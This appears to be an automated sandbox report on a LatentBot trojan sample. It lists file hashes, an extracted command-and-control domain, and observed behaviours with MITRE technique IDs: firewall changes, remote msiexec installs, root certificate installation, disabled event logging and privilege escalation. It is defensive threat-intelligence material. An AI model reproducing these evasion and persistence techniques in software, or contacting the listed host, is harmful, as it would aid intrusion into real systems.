latentbot | 99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b

Analysis

max time kernel
146s
max time network
148s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-09-2024 11:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Size

3.9MB
MD5

09e3aa460dbf9cddbb402354cb854ced
SHA1

e27bf77f6cf806e1c841fc487872d9f5f75a75f7
SHA256

99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b
SHA512

5521bdd944d58a9cf524959598fac97f810090d2f934afdb00809a75c46c163e053b0d092f955805d0be150ecbb137c1814f92c5f1887bf45ad9ee17f67dfa6c
SSDEEP

98304:7tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqYxLI:7tSb9+zykLmxd/cHwOkp7jI

Score

10^/10

latentbot discovery evasion persistence privilege_escalation trojan

Malware Config

Extracted

Family

latentbot

besthard2024.zapto.org

Signatures

LatentBot
Modular trojan written in Delphi which has been in-the-wild since 2013.
trojan latentbot

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1240	netsh.exe
2104	netsh.exe

Executes dropped EXE 4 IoCs

pid	Process
844	MSIE6C0.tmp
1500	PrintDrivers.exe
2800	PrintDriver.exe
112	PrintDrivers.exe

Loads dropped DLL 5 IoCs

pid	Process
2888	MsiExec.exe
2240	MsiExec.exe
2240	MsiExec.exe
2240	MsiExec.exe
2564	cmd.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2504	msiexec.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2504	msiexec.exe
14	2504	msiexec.exe
16	1252	msiexec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\L:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\K:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\Z:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\O:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\Q:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\T:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\J:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\X:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\S:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\R:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\W:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\Y:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\U:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\N:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\H:	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\f76e4c6.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDAF4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE3BF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE44D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE641.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE6C0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE351.tmp	msiexec.exe
File created	C:\Windows\Installer\f76e4c6.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIE6C0.tmp

Delays execution with timeout.exe 10 IoCs

evasion

pid	Process
1744	timeout.exe
2444	timeout.exe
1652	timeout.exe
2452	timeout.exe
2808	timeout.exe
2372	timeout.exe
1436	timeout.exe
1564	timeout.exe
908	timeout.exe
1472	timeout.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Kills process with taskkill 3 IoCs

evasion

pid	Process
1704	taskkill.exe
2064	taskkill.exe
2020	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
112	PrintDrivers.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1252	msiexec.exe
1252	msiexec.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe
1500	PrintDrivers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1252	msiexec.exe
Token: SeTakeOwnershipPrivilege	1252	msiexec.exe
Token: SeSecurityPrivilege	1252	msiexec.exe
Token: SeCreateTokenPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeAssignPrimaryTokenPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeLockMemoryPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeIncreaseQuotaPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeMachineAccountPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeTcbPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSecurityPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeTakeOwnershipPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeLoadDriverPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSystemProfilePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSystemtimePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeProfSingleProcessPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeIncBasePriorityPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreatePagefilePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreatePermanentPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeBackupPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeRestorePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeShutdownPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeDebugPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeAuditPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSystemEnvironmentPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeChangeNotifyPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeRemoteShutdownPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeUndockPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSyncAgentPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeEnableDelegationPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeManageVolumePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeImpersonatePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreateGlobalPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreateTokenPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeAssignPrimaryTokenPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeLockMemoryPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeIncreaseQuotaPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeMachineAccountPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeTcbPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSecurityPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeTakeOwnershipPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeLoadDriverPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSystemProfilePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSystemtimePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeProfSingleProcessPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeIncBasePriorityPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreatePagefilePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreatePermanentPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeBackupPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeRestorePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeShutdownPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeDebugPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeAuditPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSystemEnvironmentPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeChangeNotifyPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeRemoteShutdownPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeUndockPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeSyncAgentPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeEnableDelegationPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeManageVolumePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeImpersonatePrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreateGlobalPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeCreateTokenPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeAssignPrimaryTokenPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe
Token: SeLockMemoryPrivilege	2348	99822b12d5cd66b9d5fb3436c2c2f0f9d754dbf6483896800b647af57081af2b.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2504	msiexec.exe
2504	msiexec.exe
2800	PrintDriver.exe
